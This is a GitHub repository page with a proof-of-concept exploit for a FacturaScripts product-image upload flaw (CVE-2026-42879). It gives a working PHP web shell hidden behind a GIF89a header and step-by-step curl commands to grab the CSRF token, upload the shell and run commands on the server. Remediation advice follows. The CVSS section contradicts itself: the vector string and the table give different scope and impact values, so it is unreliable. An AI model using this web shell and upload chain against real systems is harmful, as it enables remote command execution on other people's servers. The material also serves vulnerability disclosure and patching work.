Skip to content

guzrex/CVE-2026-42879

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
.gitignore
.gitignore
 
 
Exploit.py
Exploit.py
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2026-42879 - FacturaScripts - Authenticated Unrestricted File Upload via MIME Type Bypass

Summary

An authenticated unrestricted file upload vulnerability exists in FacturaScripts' product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image (using a GIF89a header), bypassing MIME type validation. The file is stored with its original extension, including executable extensions such as .php.

Details

The vulnerability exists in:

Core/Lib/ExtendedController/ProductImagesTrait.php

Specifically in the addImageAction() method.

Vulnerable Code

if (false === strpos($uploadFile->getMimeType(), 'image/')) {
    Tools::log()->error('file-not-supported');
    continue;
}
 
$folder = Tools::folder('MyFiles');
Tools::folderCheckOrCreate($folder);
$uploadFile->move($folder, $uploadFile->getClientOriginalName());

Root Cause

  • The validation only checks if MIME type contains "image/"
  • This can be bypassed by prepending GIF89a magic bytes to a PHP file
  • The system incorrectly identifies the file as image/gif
  • The file is saved with a .php extension in a web-accessible directory

File Storage Behavior

Uploaded files are stored in:

/MyFiles/YYYY/MM/X.php

Where X is an auto-incrementing ID. This allows direct remote execution:

http://target/MyFiles/2026/03/2.php?cmd=id

Impact

Successful exploitation allows:

An attacker may upload files with executable extensions (e.g. .php) to the server, which depending on server configuration could lead to further exploitation.

Proof of Concept (Manual)

Step 1: Create malicious file

cat > shell.jpg.php << 'EOF'
GIF89a
<?php
system($_GET['cmd']);
?>
EOF

Step 2: Authenticate

  • Login to the application
  • Extract PHPSESSID from browser cookies

Step 3: Get CSRF token

curl -s "http://target/EditProducto?code=CONTA621" \
  -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
  | grep -o 'multireqtoken\" value=\"[^\"]*\"' | cut -d'"' -f4

Step 4: Upload shell

curl -X POST "http://target/EditProducto?code=CONTA621" \
  -H "Cookie: PHPSESSID=YOUR_SESSION_ID" \
  -F "multireqtoken=YOUR_CSRF_TOKEN" \
  -F "action=add-image" \
  -F "activetab=EditProductoImagen" \
  -F "idproducto=3" \
  -F "newfiles[]=@shell.jpg.php"

Step 5: Execute command

curl "http://target/MyFiles/2026/03/2.php?cmd=id"

CVSS v3.1

Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N Base Score: 6.3 (Moderate)

Metric Value
Attack Vector Network (AV:N)
Attack Complexity Low (AC:L)
Privileges Required Low (PR:L)
User Interaction None (UI:N)
Scope Changed (S:C)
Confidentiality High (C:H)
Integrity High (I:H)
Availability High (A:H)

CWE

  • CWE-434: Unrestricted Upload of File with Dangerous Type

Affected Products

Field Value
Ecosystem Packagist
CVE ID CVE-2026-42879
Package Name facturascripts/facturascripts
Affected Versions <= 2025.81
Patched Versions Not yet patched
Fixed in Pending

Remediation Recommendations

  1. Validate file extension — reject any upload where the filename ends in .php, .phtml, .phar, or other executable extensions, regardless of MIME type
  2. Re-generate filenames on the server — never use getClientOriginalName(); assign a safe UUID-based name with a validated extension
  3. Store uploads outside the webroot — serve files through a controller that streams content, preventing direct URL execution
  4. Use a file type library — validate actual file content (magic bytes + extension + MIME type) with a library like fileinfo rather than trusting client-supplied MIME

Credits

  • Discoverer: Abdullah Alwasabei / Guzrex

About

FacturaScripts RCE Exploit - Proof of Concept

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages